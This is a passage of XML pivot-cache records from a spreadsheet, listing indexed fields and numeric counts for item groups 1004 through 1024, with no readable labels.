    <x v="0"/>
    <n v="0"/>
    <x v="1004"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1004"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1004"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1004"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1004"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="1004"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="1004"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1004"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1004"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1004"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="7"/>
    <x v="1004"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1004"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="1004"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1004"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1005"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1005"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1005"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1005"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="1005"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="4"/>
    <x v="1005"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="1005"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1005"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1005"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1005"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="7"/>
    <x v="1005"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="3"/>
    <x v="1005"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="1005"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1005"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1006"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1006"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1006"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1006"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1006"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="1006"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="1006"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1006"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1006"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1006"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1006"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1006"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="1006"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1006"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1007"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1007"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1007"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1007"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1007"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="1007"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="27"/>
    <x v="1007"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="17"/>
    <x v="1007"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1007"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1007"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1007"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1007"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="1007"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1007"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1008"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1008"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1008"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1008"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1008"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1008"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1008"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="1008"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1008"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="2"/>
    <x v="1008"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="33"/>
    <x v="1008"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="38"/>
    <x v="1008"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="1008"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1008"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1009"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1009"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1009"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1009"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1009"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1009"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="1009"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="1009"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1009"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1009"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1009"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1009"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="1009"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1009"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1010"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1010"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1010"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1010"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="4"/>
    <x v="1010"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="1010"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="12"/>
    <x v="1010"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1010"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1010"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1010"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1010"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1010"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1010"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1010"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1011"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1011"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1011"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1011"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="1011"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="1011"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="1011"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="3"/>
    <x v="1011"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="3"/>
    <x v="1011"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="4"/>
    <x v="1011"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="5"/>
    <x v="1011"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="7"/>
    <x v="1011"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="1011"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1011"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1012"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1012"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1012"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1012"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1012"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1012"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="6"/>
    <x v="1012"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="1012"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1012"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="1"/>
    <x v="1012"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="5"/>
    <x v="1012"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="15"/>
    <x v="1012"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="1012"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1012"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1013"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1013"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1013"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1013"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1013"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="1013"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="41"/>
    <x v="1013"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="1013"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1013"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1013"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="24"/>
    <x v="1013"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="6"/>
    <x v="1013"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1013"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="1013"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1014"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1014"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1014"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1014"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1014"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1014"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1014"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1014"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1014"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1014"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="3"/>
    <x v="1014"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="2"/>
    <x v="1014"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="28"/>
    <x v="1014"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1014"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1015"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1015"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1015"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1015"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="7"/>
    <x v="1015"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="1015"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1015"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1015"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="36"/>
    <x v="1015"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="63"/>
    <x v="1015"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1015"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1015"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="20"/>
    <x v="1015"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="1015"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1016"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1016"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1016"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1016"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="1016"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="1016"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1016"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1016"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1016"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1016"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="12"/>
    <x v="1016"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="10"/>
    <x v="1016"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1016"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="1016"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1017"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1017"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1017"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1017"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="1017"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="1017"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="10"/>
    <x v="1017"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1017"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1017"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1017"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1017"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1017"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1017"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1017"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1018"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1018"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1018"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1018"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="1018"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1018"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="1018"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1018"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1018"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1018"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="5"/>
    <x v="1018"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="20"/>
    <x v="1018"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="1018"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1018"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1019"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1019"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1019"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1019"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="1019"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="1019"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="1019"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1019"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1019"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1019"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1019"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1019"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="1019"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1019"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1020"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1020"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1020"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1020"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="10"/>
    <x v="1020"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="23"/>
    <x v="1020"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="122"/>
    <x v="1020"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="311"/>
    <x v="1020"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="1"/>
    <x v="1020"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="8"/>
    <x v="1020"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="86"/>
    <x v="1020"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="55"/>
    <x v="1020"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="1020"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="3"/>
    <x v="1020"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1021"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1021"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1021"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1021"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="6"/>
    <x v="1021"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="8"/>
    <x v="1021"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="4"/>
    <x v="1021"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1021"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="9"/>
    <x v="1021"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="6"/>
    <x v="1021"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="89"/>
    <x v="1021"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="45"/>
    <x v="1021"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="20"/>
    <x v="1021"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1021"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1022"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1022"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1022"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1022"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1022"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="1022"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="1022"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="3"/>
    <x v="1022"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1022"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1022"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="4"/>
    <x v="1022"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="3"/>
    <x v="1022"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="20"/>
    <x v="1022"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1022"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1023"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1023"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1023"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1023"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1023"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1023"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="1023"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="1023"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1023"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1023"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="2"/>
    <x v="1023"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="2"/>
    <x v="1023"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1023"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="25"/>
    <x v="1023"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1024"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1024"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1024"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1024"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1024"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1024"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1024"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1024"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1024"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1024"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="2"/>
    <x v="1024"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="5"/>
    <x v="1024"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="1024"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1024"/>
  </r>
  <r>
    <x v="0"/>
